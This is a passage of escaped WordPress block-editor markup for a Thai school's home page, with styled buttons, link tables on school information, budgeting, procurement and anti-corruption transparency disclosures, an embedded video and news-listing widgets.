900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_3a11d0-a6\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_3a11d0-a6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_138813-93\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_138813-93\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_9f83a7-ce\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_9f83a7-ce\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7fabbb-99\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7fabbb-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_1d2215-71\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_1d2215-71\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7e7dd7-10\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7e7dd7-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3078a3-3c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3078a3-3c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_dadb4c-b7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_dadb4c-b7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_24abce-04\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_24abce-04\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<span class=\"gb-button gb-button-48e80028 gb-button-text\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></span>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":240},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\